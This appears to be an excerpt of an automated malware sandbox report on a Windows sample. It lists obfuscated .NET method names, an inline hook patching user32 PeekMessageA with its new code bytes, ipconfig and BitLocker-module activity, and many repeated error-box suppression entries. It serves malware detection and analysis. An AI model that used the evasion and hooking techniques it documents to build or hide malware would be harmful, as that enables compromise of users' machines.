            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, vIVW76QciyDMhnTEs5.csHigh entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, TUmxrsUiBFh387Pp3F.csHigh entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, uba7PbrorjVOM4GOH5.csHigh entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, hvp7roBlu5tt8sCfCj.csHigh entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, bLPwuclivPPYX0pkcA.csHigh entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, fbwr5b7b1tBIX1pc65.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, CF6at9d87kkyRS2U6N.csHigh entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, ggRwXVvoU8G6iTnm8Z.csHigh entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, VB0K75NHNNnsBGRN1j.csHigh entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, CVk4BkAqgtM4EmPgrkO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, E6Kw9PIeHreU7N1vZn.csHigh entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, M5oJ89kPLtZaqCjIm3.csHigh entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, PXLMp9OZGUdw2XHrZK.csHigh entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, cifycjzu6Uius0SMBh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, ICJHE62k18iImlcG7g.csHigh entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.csHigh entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, YrQFSYAHoqOHrypnR1O.csHigh entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, byM0dcaLI90JrAHK1G.csHigh entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, Gt5uMimZYjGvA5DYGB.csHigh entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, Bohy8GG5IYcfb6Hpyw.csHigh entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, HK7o8Ix7Sef3O4yWON.csHigh entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, vIVW76QciyDMhnTEs5.csHigh entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, TUmxrsUiBFh387Pp3F.csHigh entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, uba7PbrorjVOM4GOH5.csHigh entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, hvp7roBlu5tt8sCfCj.csHigh entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, bLPwuclivPPYX0pkcA.csHigh entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, fbwr5b7b1tBIX1pc65.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, CF6at9d87kkyRS2U6N.csHigh entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, ggRwXVvoU8G6iTnm8Z.csHigh entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, VB0K75NHNNnsBGRN1j.csHigh entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
